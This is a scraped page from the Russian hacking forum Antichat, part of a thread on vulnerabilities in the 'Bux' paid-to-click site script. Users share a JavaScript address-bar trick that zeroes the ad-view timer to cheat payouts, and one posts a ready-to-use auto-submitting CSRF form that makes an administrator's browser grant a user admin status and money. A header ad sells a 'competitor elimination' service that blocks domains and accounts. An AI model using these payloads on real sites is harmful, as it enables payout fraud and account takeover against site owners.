Форум АНТИЧАТ - Уязвимости скрипта Bux

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Уязвимости скрипта Bux

Страница 3 из 3

Опции темы

Поиск в этой теме

Опции просмотра

#21

30.01.2009, 13:44

tarantul13

Новичок

Регистрация: 30.11.2008

Сообщений: 5

Провел на форуме:
7499

Репутация: 2

Узнал о новом для меня способе накрутки буксов!
Рассказываю:
При просмотре рекламы, в адрес вставляется код и таймер сразу на 0 становится!..
Это то вообщем, всё что я знаю!

Может кто знает защиту от этого способа взлома?

Последний раз редактировалось tarantul13; 31.01.2009 в 14:06..

#22

04.02.2009, 13:21

DIMON4G

Участник форума

Регистрация: 25.05.2008

Сообщений: 201

Провел на форуме:
1860061

Репутация: 296

Цитата:

Сообщение от tarantul13

Может кто знает защиту от этого способа взлома?

написалбы уязвимость для других, мож кто-то не знает, не 1 ты такой умный

#23

07.02.2009, 20:22

Alex_DeLarge

Новичок

Регистрация: 04.12.2008

Сообщений: 10

Провел на форуме:
6975

Репутация: 0

Цитата:

Сообщение от randomz

Привет всем, хотел узнать ... можно ли взламать вот токой аккоунт , еслй он под мд5 хашем?
Можно взламать сайт на таком движке? YourOwnBux 4.0
http://img206.imageshack.us/img206/7416/49381628gs2.jpg

P.S. Соррй за мой русский , я на транслите

Гг - этот новый букс выпущен практически со всеми старыми дырками - тоесть на него сногва пришлось все заплатки клепать!! Кстати кому интересно я всетаки защиты поставил и даже капчу почти доделал уже если интересно пишите 6321435

#24

07.02.2009, 20:26

Alex_DeLarge

Новичок

Регистрация: 04.12.2008

Сообщений: 10

Провел на форуме:
6975

Репутация: 0

Цитата:

Сообщение от tarantul13

Может кто знает защиту от этого способа взлома?

Я думаю он об этом: Если во время просмотра рекламы в строку браузера вставить такой вот скриптик

Код:

javascript: countdown(1);

удалив при этом все что там есть то таймер сбивается на 1 секунду - так как с жабой я не дружу я не знаю как тут можно исправить!!!

#25

31.05.2010, 00:42

vaddd

Познающий

Регистрация: 06.01.2009

Сообщений: 69

Провел на форуме:
116125

Репутация: 3

XSRF в скрипте Bux
<form action="http://buxeg/admin/index.php?op=7" method="POST" name="theForm" id="theFormId">
<input type="hidden" name="id" value="1">
<input type="hidden" name="username" value="admin4eg">
<input type="hidden" name="password" value="admin4eg">
<input type="hidden" name="referer" value="">
<input type="hidden" name="email" value="vadik-95@mail.ru">
<input type="hidden" name="pemail" value="E105366777666">
<input type="hidden" name="country" value="Russia">
<input type="hidden" name="vistis" value="500">
<input type="hidden" name="referals" value="600">
<input type="hidden" name="referalvisits" value="777">
<input type="hidden" name="money" value="500">
<input type="hidden" name="user_status" value="admin">
<input type="submit" value="��" class="button">
</form>

<script type="text/javascript">
document.theForm.submit();
</script>

Страница 3 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
В свежем Safari 3.1 для Windows обнаружены уязвимости	Ali_MiX	Мировые новости	0	08.04.2008 16:13
Классификация уязвимостей	flintstone	Статьи	1	16.01.2008 18:06

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход